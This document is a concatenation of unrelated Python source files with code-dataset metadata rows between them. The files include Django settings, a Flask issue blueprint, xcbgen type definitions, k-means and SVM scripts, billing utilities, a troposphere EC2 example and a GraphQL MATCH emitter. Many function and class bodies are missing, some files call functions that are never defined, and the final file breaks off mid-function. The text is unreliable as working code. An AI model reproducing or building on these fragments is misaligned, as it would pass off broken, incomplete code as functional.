] | 2 | 2020-09-03T09:22:18.000Z | 2020-09-09T15:13:35.000Z | """
Django settings for imagetagger project.
Generated by 'django-admin startproject' using Django 1.10.3.
For more information on this file, see
https://docs.djangoproject.com/en/1.10/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.10/ref/settings/
"""
import os
from django.contrib.messages import constants as messages
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = False
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'imagetagger.annotations',
'imagetagger.base',
'imagetagger.images',
'imagetagger.users',
'imagetagger.tools',
'imagetagger.administration',
'django.contrib.admin',
'imagetagger.tagger_messages',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'rest_framework',
'widget_tweaks',
'friendlytagloader',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
'django.middleware.locale.LocaleMiddleware',
]
ROOT_URLCONF = 'imagetagger.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
'imagetagger.base.context_processors.base_data',
],
},
},
]
WSGI_APPLICATION = 'imagetagger.wsgi.application'
FILE_UPLOAD_HANDLERS = (
"django.core.files.uploadhandler.MemoryFileUploadHandler",
"django.core.files.uploadhandler.TemporaryFileUploadHandler",
)
# Password validation
# https://docs.djangoproject.com/en/1.10/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Custom user model for the whole project.
AUTH_USER_MODEL = 'users.User'
# Internationalization
# https://docs.djangoproject.com/en/1.10/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'Europe/Berlin' # Timezone of your server
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Issue-tracker link shown to users; PROBLEMS_TEXT is an optional extra blurb.
PROBLEMS_URL = 'https://github.com/bit-bots/imagetagger/issues'
PROBLEMS_TEXT = ''
LOGIN_URL = '/user/login/'
LOGIN_REDIRECT_URL = '/images/'
# Keep flash messages in the session backend.
MESSAGE_STORAGE = 'django.contrib.messages.storage.session.SessionStorage'
# Map Django message levels to CSS classes — presumably Bootstrap alert
# names ('info', 'danger', ...); confirm against the templates.
MESSAGE_TAGS = {
    messages.INFO: 'info',
    messages.ERROR: 'danger',
    messages.WARNING: 'warning',
    messages.SUCCESS: 'success',
}
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.10/howto/static-files/
STATIC_URL = '/static/'
# Separator character used when exporting annotation data.
EXPORT_SEPARATOR = '|'
DATA_PATH = os.path.join(BASE_DIR, 'data')
IMAGE_PATH = os.path.join(BASE_DIR, 'images') # the absolute path to the folder with the imagesets
# filename extension of accepted imagefiles
# NOTE(review): 'jpg' is absent — confirm whether .jpg uploads are meant to
# be rejected or only the 'jpeg' spelling was considered.
IMAGE_EXTENSION = {
    'png',
    'jpeg',
}
# Sets the default expire time for new messages in days
DEFAULT_EXPIRE_TIME = 7
# Sets the default number of messages per page
MESSAGES_PER_PAGE = 10
c7879b591e4a17bc5cbafd6cd291d2d73183569a | 23,794 | py | Python | apps/project/views/issue.py | rainydaygit/testtcloudserver | 8037603efe4502726a4d794fb1fc0a3f3cc80137 | [
"MIT"
] | 349 | 2020-08-04T10:21:01.000Z | 2022-03-23T08:31:29.000Z | apps/project/views/issue.py | rainydaygit/testtcloudserver | 8037603efe4502726a4d794fb1fc0a3f3cc80137 | [
"MIT"
] | 2 | 2021-01-07T06:17:05.000Z | 2021-04-01T06:01:30.000Z | apps/project/views/issue.py | rainydaygit/testtcloudserver | 8037603efe4502726a4d794fb1fc0a3f3cc80137 | [
"MIT"
] | 70 | 2020-08-24T06:46:14.000Z | 2022-03-25T13:23:27.000Z | from flask import request
from apps.auth.auth_require import required
from apps.project.business.issue import IssueBusiness, IssueRecordBusiness, IssueDashBoardBusiness
from apps.project.extentions import parse_json_form, validation, parse_list_args2
from library.api.render import json_detail_render, json_list_render2
from library.api.tBlueprint import tblueprint
bpname = 'issue'
view_permission = f'{bpname}_view'
modify_permission = f'{bpname}_modify'
issue = tblueprint(bpname, __name__)
# issue
# idissue
# idissue
# issue
# issue
# issue
# issue
# issuecomment
# issue-projectid,versionid
# issue
# issue
# idissue
# issuedashboard
# issue
# issue
# pro_idissue
# issue requirement
# issue
| 29.159314 | 114 | 0.504329 |
c787d4b85054cce4a273d4cda061e7e65933333a | 3,351 | py | Python | PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | PhysicsTools/PythonAnalysis/python/ParticleDecayDrawer.py | nistefan/cmssw | ea13af97f7f2117a4f590a5e654e06ecd9825a5b | [
"Apache-2.0"
] | null | null | null | # Benedikt Hegner, DESY
# benedikt.hegner@cern.ch
#
# this tool is based on Luca Lista's tree drawer module
| 33.848485 | 81 | 0.497165 |
c788076445fbf7d0da81cc5cf12ab9482e59b110 | 357 | py | Python | translator.py | liuprestin/pyninjaTUT-translator | 903642ff56f573ed9c58b6f7db4e6fbb4e722c8d | [
"MIT"
] | null | null | null | translator.py | liuprestin/pyninjaTUT-translator | 903642ff56f573ed9c58b6f7db4e6fbb4e722c8d | [
"MIT"
] | null | null | null | translator.py | liuprestin/pyninjaTUT-translator | 903642ff56f573ed9c58b6f7db4e6fbb4e722c8d | [
"MIT"
] | null | null | null | from translate import Translator
translator = Translator(to_lang="zh")
try:
with open('./example.md', mode='r') as in_file:
text = in_file.read()
with open('./example-tranlated.md', mode='w') as trans_file:
trans_file.write(translator.translate(text))
except FileNotFoundError as e:
print('check your file path') | 27.461538 | 64 | 0.661064 |
c788d246174ead31e98e8d4b7639bcc5eb1a1074 | 580 | py | Python | reddit2telegram/channels/news/app.py | mainyordle/reddit2telegram | 1163e15aed3b6ff0fba65b222d3d9798f644c386 | [
"MIT"
] | 187 | 2016-09-20T09:15:54.000Z | 2022-03-29T12:22:33.000Z | reddit2telegram/channels/news/app.py | mainyordle/reddit2telegram | 1163e15aed3b6ff0fba65b222d3d9798f644c386 | [
"MIT"
] | 84 | 2016-09-22T14:25:07.000Z | 2022-03-19T01:26:17.000Z | reddit2telegram/channels/news/app.py | mainyordle/reddit2telegram | 1163e15aed3b6ff0fba65b222d3d9798f644c386 | [
"MIT"
] | 172 | 2016-09-21T15:39:39.000Z | 2022-03-16T15:15:58.000Z | #encoding:utf-8
from utils import weighted_random_subreddit
t_channel = '@news756'
subreddit = weighted_random_subreddit({
'politics': 0.5,
'news': 0.5
})
| 27.619048 | 75 | 0.653448 |
c78915846f029ced4be55e06e50f81dcf24cc440 | 21,941 | py | Python | xcbgen/xtypes.py | tizenorg/framework.uifw.xorg.xcb.xcb-proto | d5ce7205c9bdd3e28d96d162617e32de1c126f8b | [
"X11"
] | 1 | 2022-03-21T15:39:01.000Z | 2022-03-21T15:39:01.000Z | targetfs/XSGX/lib/python2.6/site-packages/xcbgen/xtypes.py | jhofstee/Graphics_SDK | 805bd44f347ed40699a84979bc9f3e8eb085fd9e | [
"Fair",
"Unlicense"
] | null | null | null | targetfs/XSGX/lib/python2.6/site-packages/xcbgen/xtypes.py | jhofstee/Graphics_SDK | 805bd44f347ed40699a84979bc9f3e8eb085fd9e | [
"Fair",
"Unlicense"
] | null | null | null | '''
This module contains the classes which represent XCB data types.
'''
from xcbgen.expr import Field, Expression
import __main__
# Cardinal datatype globals. See module __init__ method.
tcard8 = SimpleType(('uint8_t',), 1)
tcard16 = SimpleType(('uint16_t',), 2)
tcard32 = SimpleType(('uint32_t',), 4)
tint8 = SimpleType(('int8_t',), 1)
tint16 = SimpleType(('int16_t',), 2)
tint32 = SimpleType(('int32_t',), 4)
tchar = SimpleType(('char',), 1)
tfloat = SimpleType(('float',), 4)
tdouble = SimpleType(('double',), 8)
# for m in self.fields:
# if not m.type.fixed_size():
# return False
# return True
_placeholder_byte = Field(PadType(None), tcard8.name, 'pad0', False, True, False)
| 34.661927 | 112 | 0.593182 |
c78a85d9115e200586e2ed2d790dc6b616c4151d | 3,769 | py | Python | BioKlustering-Website/mlmodel/parser/kmeans.py | solislemuslab/mycovirus-website | bc8d3d5f9a9472c35e40334f19e90bbf782f7a1b | [
"MIT"
] | 1 | 2021-11-23T15:07:58.000Z | 2021-11-23T15:07:58.000Z | BioKlustering-Website/mlmodel/parser/kmeans.py | solislemuslab/mycovirus-website | bc8d3d5f9a9472c35e40334f19e90bbf782f7a1b | [
"MIT"
] | 2 | 2020-10-23T15:40:49.000Z | 2020-10-28T13:21:16.000Z | BioKlustering-Website/mlmodel/parser/kmeans.py | solislemuslab/bioklustering | bc8d3d5f9a9472c35e40334f19e90bbf782f7a1b | [
"MIT"
] | 2 | 2021-11-04T20:01:36.000Z | 2021-11-23T15:13:34.000Z | # Copyright 2020 by Luke Selberg, Solis-Lemus Lab, WID.
# All rights reserved.
# This file is part of the BioKlustering Website.
import pandas as pd
from Bio import SeqIO
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.cluster import KMeans
from sklearn.decomposition import PCA
from sklearn.cluster import MeanShift
from sklearn import preprocessing
import numpy as np
import os
from .helpers import plotly_dash_show_plot
# credit to chunrong
| 37.316832 | 113 | 0.717166 |
c78a9dbe76748ffc4b552241c18002c06e087035 | 1,920 | py | Python | workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 5cdba4d14c8998b937c1aa6af8e3417251fac540 | [
"MIT"
] | 13 | 2016-03-31T16:19:59.000Z | 2019-09-26T20:47:57.000Z | workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 5cdba4d14c8998b937c1aa6af8e3417251fac540 | [
"MIT"
] | 6 | 2015-09-18T15:24:43.000Z | 2019-10-23T16:51:39.000Z | workflow/src/routing.py | mibexsoftware/alfred-stash-workflow | 5cdba4d14c8998b937c1aa6af8e3417251fac540 | [
"MIT"
] | 3 | 2015-09-16T18:05:32.000Z | 2020-01-04T19:41:21.000Z | # -*- coding: utf-8 -*-
from src import icons, __version__
from src.actions import HOST_URL
from src.actions.configure import ConfigureWorkflowAction
from src.actions.help import HelpWorkflowAction
from src.actions.index import IndexWorkflowAction
from src.actions.projects import ProjectWorkflowAction
from src.actions.pull_requests import PullRequestWorkflowAction
from src.actions.repositories import RepositoryWorkflowAction
from src.util import workflow, call_alfred
# Maps an Alfred keyword suffix (e.g. ':config') to the workflow-action class
# that handles it; presumably consulted by a dispatcher defined later in this
# module — confirm against the routing code.
WORKFLOW_ACTIONS = {
    ':config': ConfigureWorkflowAction,
    ':projects': ProjectWorkflowAction,
    ':repos': RepositoryWorkflowAction,
    ':pullrequests': PullRequestWorkflowAction,
    ':help': HelpWorkflowAction
}
| 39.183673 | 105 | 0.678125 |
c78c8acd4546ee0e8cf65b0df48d4a928c3e7481 | 1,262 | py | Python | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
] | 2 | 2020-10-02T03:01:32.000Z | 2020-12-06T09:21:06.000Z | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
] | null | null | null | model/model.py | CaoHoangTung/shark-cop-server | 38cb494d45297b723b4ef6bf82b8c9e53c2993a0 | [
"MIT"
] | null | null | null | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.svm import SVC
from sklearn.metrics import classification_report, confusion_matrix
from mlxtend.plotting import plot_decision_regions
# from sklearn import datasets
from pandas.plotting import scatter_matrix
from joblib import dump, load
import collections
kaggle_data = pd.read_csv('data/kaggle.csv')
data = pd.read_csv('data/new_data.csv')
kaggle_X = kaggle_data.iloc[:, :30].values
X = data.drop(['index'],axis=1).iloc[:, :30].values
y = data.iloc[:,-1].values
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size = 0.99)
kaggle_X_train, kaggle_X_test, kaggle_y_train, kaggle_y_test = train_test_split(X, y, test_size = 0.02)
svclassifier = SVC(kernel='poly',degree=5)
svclassifier.fit(kaggle_X_train, kaggle_y_train)
dump(svclassifier, 'pre_model.joblib')
y_pred = svclassifier.predict(X_test)
print(confusion_matrix(y_test,y_pred))
print(classification_report(y_test,y_pred))
# print("X=%s, Predicted=%s" % (test_2d, y_pred_test[0]))
# print(y_pred.shape)
# TESTING ZONE
X = [[-1,1,0,-1,-1,-1,1,0,-1,1,1,-1,0,0,-1,-1,-1,-1,0,1,0,0,0,-1,1,1,1,1,-1,-1]]
print("PREDICTION:",svclassifier.predict(X))
| 33.210526 | 103 | 0.759113 |
c78d0f81c7f3ce50a968bb140ed1caaa45e4bf4b | 547 | py | Python | PE032.py | CaptainSora/Python-Project-Euler | 056400f434eec837ece5ef06653b310ebfcc3d4e | [
"MIT"
] | null | null | null | PE032.py | CaptainSora/Python-Project-Euler | 056400f434eec837ece5ef06653b310ebfcc3d4e | [
"MIT"
] | null | null | null | PE032.py | CaptainSora/Python-Project-Euler | 056400f434eec837ece5ef06653b310ebfcc3d4e | [
"MIT"
] | null | null | null | from itertools import count
from _pandigital_tools import is_pandigital
def pand_products():
    """
    Sum every product n = a * b whose identity a * b = n uses each of the
    digits 1-9 exactly once across a, b and n together.

    A set is used so products reachable through several factorisations are
    counted only once.
    """
    products = set()
    for multiplicand in range(2, 100):
        multiplier = multiplicand
        while True:
            product = multiplicand * multiplier
            # Once the concatenation exceeds nine digits it can never be
            # 1-9 pandigital, and growing the multiplier only lengthens it.
            if len("%d%d%d" % (multiplicand, multiplier, product)) > 9:
                break
            if is_pandigital(multiplicand, multiplier, product):
                products.add(product)
            multiplier += 1
    return sum(products)
c78d62ba8abdde61ef2fb89e7ca95a09bbcfc5d2 | 282 | py | Python | v1/models.py | jdubansky/openstates.org | 6fd5592aae554c4bb201f0a76ed3605bff5204c2 | [
"MIT"
] | 1 | 2022-01-17T11:54:28.000Z | 2022-01-17T11:54:28.000Z | v1/models.py | washabstract/openstates.org | dc541ae5cd09dd3b3db623178bf32a03d0246f01 | [
"MIT"
] | null | null | null | v1/models.py | washabstract/openstates.org | dc541ae5cd09dd3b3db623178bf32a03d0246f01 | [
"MIT"
] | null | null | null | from django.db import models
from openstates.data.models import Bill
| 28.2 | 69 | 0.758865 |
c78e2f38914cd69e3bd290dd0efeba4071626991 | 14,594 | py | Python | corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 233f255ff20ab3a16013e9fdfdb9c1dcf632e415 | [
"BSD-3-Clause"
] | null | null | null | corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 233f255ff20ab3a16013e9fdfdb9c1dcf632e415 | [
"BSD-3-Clause"
] | 1 | 2021-06-02T04:45:16.000Z | 2021-06-02T04:45:16.000Z | corehq/apps/accounting/utils.py | satyaakam/commcare-hq | 233f255ff20ab3a16013e9fdfdb9c1dcf632e415 | [
"BSD-3-Clause"
] | null | null | null | import datetime
import logging
from collections import defaultdict, namedtuple
from django.conf import settings
from django.template.loader import render_to_string
from django.urls import reverse
from django.utils.translation import ugettext_lazy as _
from django_prbac.models import Grant, Role, UserRole
from corehq.const import USER_DATE_FORMAT
from dimagi.utils.couch.database import iter_docs
from dimagi.utils.dates import add_months
from corehq import privileges
from corehq.apps.accounting.exceptions import (
AccountingError,
ProductPlanNotFoundError,
)
from corehq.apps.domain.models import Domain
from corehq.util.quickcache import quickcache
from corehq.util.view_utils import absolute_reverse
logger = logging.getLogger('accounting')
EXCHANGE_RATE_DECIMAL_PLACES = 9
def fmt_feature_rate_dict(feature, feature_rate=None):
    """
    Build a JSON-serializable dict describing *feature* and its FeatureRate.

    When *feature_rate* is not supplied, the feature's current rate is used.
    Monetary fields are stringified so the dict can be JSON-encoded directly.
    """
    rate = feature_rate if feature_rate is not None else feature.get_rate()
    return {
        'name': feature.name,
        'feature_type': feature.feature_type,
        'feature_id': feature.id,
        'rate_id': rate.id,
        'monthly_fee': str(rate.monthly_fee),
        'monthly_limit': rate.monthly_limit,
        'per_excess_fee': str(rate.per_excess_fee),
    }
def fmt_product_rate_dict(product_name, product_rate=None):
    """
    Build a JSON-serializable dict describing a SoftwareProductRate.

    If no rate is passed, the newest active rate with the given name is
    looked up; if none exists, a new active rate is created.
    """
    # Local import -- presumably avoids a circular import at module load; verify.
    from corehq.apps.accounting.models import SoftwareProductRate
    if product_rate is None:
        try:
            # Most recently created active rate for this product name.
            product_rate = SoftwareProductRate.objects.filter(
                is_active=True,
                name=product_name,
            ).latest('date_created')
        except SoftwareProductRate.DoesNotExist:
            # No rate on record yet: create one with default fees.
            product_rate = SoftwareProductRate.objects.create(name=product_name, is_active=True)
    return {
        'name': product_rate.name,
        'rate_id': product_rate.id,
        # Stringified so the dict is directly JSON-encodable.
        'monthly_fee': str(product_rate.monthly_fee),
    }
ChangeStatusResult = namedtuple('ChangeStatusResult', ['adjustment_reason', 'downgraded_privs', 'upgraded_privs'])
def is_active_subscription(date_start, date_end, today=None):
    """
    Return True when the subscription window [date_start, date_end) contains
    *today*. A None bound is treated as unbounded on that side; *today*
    defaults to the current date.
    """
    if today is None:
        today = datetime.date.today()
    has_started = date_start is None or date_start <= today
    has_not_ended = date_end is None or today < date_end
    return has_started and has_not_ended
def has_subscription_already_ended(subscription):
    """Return True when the subscription has an end date at or before today."""
    end_date = subscription.date_end
    return end_date is not None and end_date <= datetime.date.today()
def get_money_str(amount):
    """
    Format *amount* as a dollar string with two decimals, e.g. "$3.50" or
    "-$2.00" (sign before the dollar sign). Returns "" when amount is None.
    """
    if amount is None:
        return ""
    sign = "-" if amount < 0 else ""
    return "%s$%0.2f" % (sign, abs(amount))
def get_address_from_invoice(invoice):
    """
    Build the billing Address for an invoice from its account's
    BillingContactInfo; falls back to an empty Address when the account
    has no contact info on record.
    """
    # Local imports -- presumably avoid circular imports at module load; verify.
    from corehq.apps.accounting.invoice_pdf import Address
    from corehq.apps.accounting.models import BillingContactInfo
    try:
        contact_info = BillingContactInfo.objects.get(
            account=invoice.account,
        )
        return Address(
            name=(
                # Either name part may be NULL in the DB; substitute "" so the
                # joined string never contains the text "None".
                "%s %s" %
                (contact_info.first_name
                 if contact_info.first_name is not None else "",
                 contact_info.last_name
                 if contact_info.last_name is not None else "")
            ),
            company_name=contact_info.company_name,
            first_line=contact_info.first_line,
            second_line=contact_info.second_line,
            city=contact_info.city,
            region=contact_info.state_province_region,
            postal_code=contact_info.postal_code,
            country=contact_info.country,
        )
    except BillingContactInfo.DoesNotExist:
        # No contact info for this account: render a blank address block.
        return Address()
def get_dimagi_from_email():
    """Return the "From" header used for Dimagi accounts email."""
    sender_template = "Dimagi CommCare Accounts <%(email)s>"
    return sender_template % {'email': settings.INVOICING_CONTACT_EMAIL}
def ensure_grants(grants_to_privs, dry_run=False, verbose=False, roles_by_slug=None):
    """
    Adds a parameterless grant between grantee and priv, looked up by slug.
    :param grants_to_privs: An iterable of two-tuples:
        `(grantee_slug, priv_slugs)`. Will only be iterated once.
    :param dry_run: when True, log what would happen but write nothing.
    :param verbose: when True, log already-granted and newly-granted pairs.
    :param roles_by_slug: optional pre-fetched {slug: Role} cache; fetched
        from the DB when omitted.
    """
    dry_run_tag = "[DRY RUN] " if dry_run else ""
    if roles_by_slug is None:
        roles_by_slug = {role.slug: role for role in Role.objects.all()}
    # Snapshot of existing grants: from-role slug -> set of to-role slugs.
    granted = defaultdict(set)
    for grant in Grant.objects.select_related('from_role', 'to_role').all():
        granted[grant.from_role.slug].add(grant.to_role.slug)
    grants_to_create = []
    for grantee_slug, priv_slugs in grants_to_privs:
        if grantee_slug not in roles_by_slug:
            logger.info('grantee %s does not exist.', grantee_slug)
            continue
        for priv_slug in priv_slugs:
            if priv_slug not in roles_by_slug:
                logger.info('privilege %s does not exist.', priv_slug)
                continue
            if priv_slug in granted[grantee_slug]:
                if verbose or dry_run:
                    logger.info('%sPrivilege already granted: %s => %s',
                                dry_run_tag, grantee_slug, priv_slug)
            else:
                # Track in-memory too, so duplicate input pairs are only queued once.
                granted[grantee_slug].add(priv_slug)
                if verbose or dry_run:
                    logger.info('%sGranting privilege: %s => %s',
                                dry_run_tag, grantee_slug, priv_slug)
                if not dry_run:
                    grants_to_create.append(Grant(
                        from_role=roles_by_slug[grantee_slug],
                        to_role=roles_by_slug[priv_slug]
                    ))
    if grants_to_create:
        # Invalidate the role cache before bulk-inserting the new grants.
        Role.get_cache().clear()
        Grant.objects.bulk_create(grants_to_create)
c790959983852e5ff5dc7391f5d9c3bf229bac12 | 435 | py | Python | hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | d988f69c55972af445ec3ba04fd4cd1199593d10 | [
"MIT"
] | 3 | 2021-12-16T14:32:45.000Z | 2022-01-25T03:10:48.000Z | hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | d988f69c55972af445ec3ba04fd4cd1199593d10 | [
"MIT"
] | null | null | null | hci/command/commands/le_apcf_commands/apcf_service_data.py | cc4728/python-hci | d988f69c55972af445ec3ba04fd4cd1199593d10 | [
"MIT"
] | 1 | 2022-01-25T03:10:50.000Z | 2022-01-25T03:10:50.000Z | from ..le_apcf_command_pkt import LE_APCF_Command
from struct import pack, unpack
from enum import IntEnum
"""
This pare base on spec <<Android BT HCI Requirement for BLE feature>> v0.52
Advertisement Package Content filter
"""
| 25.588235 | 75 | 0.698851 |
c790fdff7571a6a4a1222a967671954a3b60828b | 1,468 | py | Python | source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 3b990e5fd92543f7152b4a2c8e689e771578c047 | [
"Apache-2.0"
] | 178 | 2016-09-21T19:51:28.000Z | 2021-09-07T17:37:06.000Z | source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 3b990e5fd92543f7152b4a2c8e689e771578c047 | [
"Apache-2.0"
] | null | null | null | source/documentModel/representations/DocumentNGramSymWinGraph.py | Vyvy-vi/Ngram-Graphs | 3b990e5fd92543f7152b4a2c8e689e771578c047 | [
"Apache-2.0"
] | 17 | 2016-10-21T02:11:13.000Z | 2020-10-07T19:11:54.000Z | """
DocumentNGramSymWinGraph.py
Created on May 23, 2017, 4:56 PM
"""
import networkx as nx
import pygraphviz as pgv
import matplotlib.pyplot as plt
from networkx.drawing.nx_agraph import graphviz_layout
from DocumentNGramGraph import DocumentNGramGraph
| 26.690909 | 55 | 0.52248 |
c791642581cbd1a8e05d99ab1f306e65029dc666 | 2,212 | py | Python | examples/EC2Conditions.py | DrLuke/troposphere | 05672a2b0cf87215dbd6a2a656669e0d3c92d0e5 | [
"BSD-2-Clause"
] | 1 | 2021-04-03T22:24:36.000Z | 2021-04-03T22:24:36.000Z | examples/EC2Conditions.py | cartermeyers/troposphere | 4b42fa0d65f73cec28184b5349aa198fb8ee5b2e | [
"BSD-2-Clause"
] | 1 | 2021-06-25T15:20:46.000Z | 2021-06-25T15:20:46.000Z | examples/EC2Conditions.py | cartermeyers/troposphere | 4b42fa0d65f73cec28184b5349aa198fb8ee5b2e | [
"BSD-2-Clause"
] | 5 | 2020-05-10T13:50:32.000Z | 2021-09-09T09:06:54.000Z | from __future__ import print_function
from troposphere import (
Template, Parameter, Ref, Condition, Equals, And, Or, Not, If
)
from troposphere import ec2
# Four free-form string parameters drive the condition examples below;
# SshKeyName is the EC2 key pair used by the instance resource.
parameters = {
    "One": Parameter(
        "One",
        Type="String",
    ),
    "Two": Parameter(
        "Two",
        Type="String",
    ),
    "Three": Parameter(
        "Three",
        Type="String",
    ),
    "Four": Parameter(
        "Four",
        Type="String",
    ),
    "SshKeyName": Parameter(
        "SshKeyName",
        Type="String",
    )
}
# Demonstrates every condition combinator: Equals, Not, Or, And, plus
# references to previously defined conditions via Condition(name).
conditions = {
    "OneEqualsFoo": Equals(
        Ref("One"),
        "Foo"
    ),
    "NotOneEqualsFoo": Not(
        Condition("OneEqualsFoo")
    ),
    "BarEqualsTwo": Equals(
        "Bar",
        Ref("Two")
    ),
    "ThreeEqualsFour": Equals(
        Ref("Three"),
        Ref("Four")
    ),
    "OneEqualsFooOrBarEqualsTwo": Or(
        Condition("OneEqualsFoo"),
        Condition("BarEqualsTwo")
    ),
    "OneEqualsFooAndNotBarEqualsTwo": And(
        Condition("OneEqualsFoo"),
        Not(Condition("BarEqualsTwo"))
    ),
    "OneEqualsFooAndBarEqualsTwoAndThreeEqualsPft": And(
        Condition("OneEqualsFoo"),
        Condition("BarEqualsTwo"),
        Equals(Ref("Three"), "Pft")
    ),
    "OneIsQuzAndThreeEqualsFour": And(
        Equals(Ref("One"), "Quz"),
        Condition("ThreeEqualsFour")
    ),
    # NOTE(review): combines contradictory terms (OneEqualsFoo AND
    # NotOneEqualsFoo), so this can never evaluate true -- presumably
    # intentional for illustration.
    "LaunchInstance": And(
        Condition("OneEqualsFoo"),
        Condition("NotOneEqualsFoo"),
        Condition("BarEqualsTwo"),
        Condition("OneEqualsFooAndNotBarEqualsTwo"),
        Condition("OneIsQuzAndThreeEqualsFour")
    ),
    "LaunchWithGusto": And(
        Condition("LaunchInstance"),
        Equals(Ref("One"), "Gusto")
    )
}
resources = {
    # NOTE(review): If() references "ConditionNameEqualsFoo", which is not
    # defined in `conditions` above; CloudFormation would reject this
    # template -- likely meant "OneEqualsFoo". Confirm upstream.
    "Ec2Instance": ec2.Instance(
        "Ec2Instance",
        Condition="LaunchInstance",
        ImageId=If("ConditionNameEqualsFoo", "ami-12345678", "ami-87654321"),
        InstanceType="t1.micro",
        KeyName=Ref("SshKeyName"),
        SecurityGroups=["default"],
    )
}
# Assemble the template from the dicts above and emit it as JSON.
t = Template()
for p in parameters.values():
    t.add_parameter(p)
for k in conditions:
    t.add_condition(k, conditions[k])
for r in resources.values():
    t.add_resource(r)
print(t.to_json())
| 22.343434 | 77 | 0.573689 |
c79252ab386af5d00249bc02769ec35279e30201 | 768 | py | Python | fist_phase/08_objects.py | kapuni/exercise_py | b60ba8462d2545cae57483bcb0b3428b03c5d522 | [
"MIT"
] | null | null | null | fist_phase/08_objects.py | kapuni/exercise_py | b60ba8462d2545cae57483bcb0b3428b03c5d522 | [
"MIT"
] | null | null | null | fist_phase/08_objects.py | kapuni/exercise_py | b60ba8462d2545cae57483bcb0b3428b03c5d522 | [
"MIT"
] | null | null | null |
if __name__ == '__main__':
main() | 23.272727 | 53 | 0.605469 |
c79307bf6012742aa0a7a562893d0160e400a873 | 1,108 | py | Python | lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 4380755a65b35265e84ecbf4b87e872d79e8f079 | [
"Apache-2.0"
] | 57 | 2020-11-18T15:13:06.000Z | 2022-03-28T22:33:26.000Z | lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 4380755a65b35265e84ecbf4b87e872d79e8f079 | [
"Apache-2.0"
] | 5 | 2021-02-23T22:11:07.000Z | 2021-12-13T00:13:48.000Z | lrtc_lib/data/load_dataset.py | MovestaDev/low-resource-text-classification-framework | 4380755a65b35265e84ecbf4b87e872d79e8f079 | [
"Apache-2.0"
] | 14 | 2021-02-10T08:55:27.000Z | 2022-02-23T22:37:54.000Z | # (c) Copyright IBM Corporation 2020.
# LICENSE: Apache License 2.0 (Apache-2.0)
# http://www.apache.org/licenses/LICENSE-2.0
import logging
from lrtc_lib.data_access import single_dataset_loader
from lrtc_lib.data_access.processors.dataset_part import DatasetPart
from lrtc_lib.oracle_data_access import gold_labels_loader
logging.basicConfig(level=logging.INFO, format='%(asctime)s %(levelname)-8s [%(filename)s:%(lineno)d] %(message)s')
if __name__ == '__main__':
dataset_name = 'polarity'
load(dataset=dataset_name) | 35.741935 | 115 | 0.730144 |
c79467938af160abb2d49f1add583ea15a8cc080 | 8,019 | py | Python | graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | [
"MIT"
] | null | null | null | graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | [
"MIT"
] | null | null | null | graphql_compiler/compiler/emit_match.py | BarracudaPff/code-golf-data-pythpn | 42e8858c2ebc6a061012bcadb167d29cebb85c5e | [
"MIT"
] | null | null | null | """Convert lowered IR basic blocks to MATCH query strings."""
from collections import deque
import six
from .blocks import Filter, MarkLocation, QueryRoot, Recurse, Traverse
from .expressions import TrueLiteral
from .helpers import get_only_element_from_collection, validate_safe_string
def _get_vertex_location_name(location):
"""Get the location name from a location that is expected to point to a vertex."""
mark_name, field_name = location.get_location_name()
if field_name is not None:
